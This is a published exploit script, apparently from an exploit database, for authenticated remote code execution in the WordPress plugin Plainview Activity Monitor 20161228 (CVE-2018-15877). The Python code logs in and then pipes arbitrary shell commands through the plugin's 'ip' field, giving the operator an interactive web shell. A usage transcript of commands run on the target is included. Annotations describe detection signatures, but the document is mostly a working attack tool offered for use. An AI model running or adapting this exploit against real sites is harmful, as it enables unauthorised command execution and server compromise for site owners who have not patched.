WordPress Plainview Activity Monitor 20161228 Remote Code Execution

  • # Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
    # Date: 07.07.2021
    # Exploit Author: Beren Kuday GORUN
    # Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
    # Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
    # Version: 20161228 and possibly prior
    # Fixed version: 20180826
    # CVE : CVE-2018-15877
    
    """
    -------------------------
    Usage:
    ┌──([email protected])-[~/tools]
    └─# python3 WordPress-Activity-Monitor-RCE.py
    What's your target IP?
    192.168.101.28
    What's your username?
    mark
    What's your password?
    password123
    [*] Please wait...
    [*] Perfect! 
    www-data@192.168.101.28 whoami
    www-data
    www-data@192.168.101.28 pwd
    /var/www/html/wp-admin
    www-data@192.168.101.28 id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    """
    
    import requests
    from bs4 import BeautifulSoup
    
    def exploit(whoami, ip):
     # Interactive loop: every line typed at the "<whoami>@<ip>" prompt is sent
     # as the plugin's 'ip' POST field, prefixed with a hostname and a shell
     # pipe. The "Output from dig:" marker parsed below shows that the plugin
     # (20161228, CVE-2018-15877 per the header) passes this field to a dig
     # invocation without rejecting shell metacharacters; the 20180826 release
     # named in the header is the fix. Each request carries the WordPress
     # session cookies from getCookie(), so the page is only reachable with
     # valid credentials. From a monitoring standpoint, POSTs to
     # page=plainview_activity_monitor&tab=activity_tools whose 'ip' value
     # contains a '|' are the signature of this abuse.
     # The loop has no exit: it runs until the process is killed, or until the
     # split()[1] below raises IndexError because the dig marker is absent
     # (session not authenticated, or the plugin no longer echoes dig output).
     while 1:
     cmd = input(whoami+"@"+ip+" ")
     url = 'http://' + ip + '/wp-admin/admin.php?page=plainview\_activity\_monitor&tab=activity\_tools'
     payload = "google.com.tr | " + cmd
     data = {'ip': payload , 'lookup' : 'lookup' }
     x = requests.post(url, data = data, cookies=getCookie(ip))
     # Everything after the marker is re-parsed; only the first <p> is shown.
     html\_doc = x.text.split("<p>Output from dig: </p>")[1]
     soup = BeautifulSoup(html\_doc, 'html.parser')
     print(soup.p.text)
    
    def poc(ip):
     # One-shot confirmation of the injection: posts 'google.fr | whoami' as the
     # 'ip' field, takes the first paragraph after the "Output from dig:" marker
     # (the web server's user name in the header transcript) and hands it to
     # exploit() as the prompt label. split()[1] raises IndexError when the
     # marker is missing from the response, which is what happens when the
     # login cookies are not valid or the plugin has been updated.
     url = 'http://' + ip + '/wp-admin/admin.php?page=plainview\_activity\_monitor&tab=activity\_tools'
     myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' }
     x = requests.post(url, data = myobj, cookies=getCookie(ip))
     html\_doc = x.text.split("<p>Output from dig: </p>")[1]
     soup = BeautifulSoup(html\_doc, 'html.parser')
     print("[*] Perfect! ")
     exploit(soup.p.text, ip)
    
    def getCookie(ip):
     # Logs in to wp-login.php with the module-level `username` / `password`
     # (read from stdin at the bottom of the script) and returns the WordPress
     # session cookies as a {name: value} dict. Called once per request by
     # exploit() and poc(), so every command re-authenticates.
     # Credentials are sent over plain http://, i.e. in cleartext on the wire.
     url = 'http://' + ip + '/wp-login.php'
     #log=admin&pwd=admin&wp-submit=Log+In&redirect\_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1
     data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'}
     x = requests.post(url, data = data)
     cookies = {}
     # Raises KeyError if the response carries no Set-Cookie header (e.g. a
     # rejected login); there is no explicit failure message.
     cookie = str(x.headers["Set-Cookie"])

     # Manual header parsing: keep whitespace-separated fragments that contain
     # both "wordpress" and '='; the last character of each value is dropped
     # (presumably the ';' separator — a fragment without one loses a real
     # character of its value).
     for i in cookie.split():
     if(i.find("wordpress") != -1 and i.find("=") != -1):
     cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1]
     return cookies
    
    # Entry point: prompts for the target and WordPress credentials, then starts
    # the interactive session through poc(). `username` and `password` are
    # globals consumed by getCookie(); no validation is applied to `ip` before it
    # is spliced into the request URLs.
    ip = input("What's your target IP?\n")
    username = input("What's your username?\n")
    password = input("What's your password?\n")
    print("[*] Please wait...")
    poc(ip)
     
    
    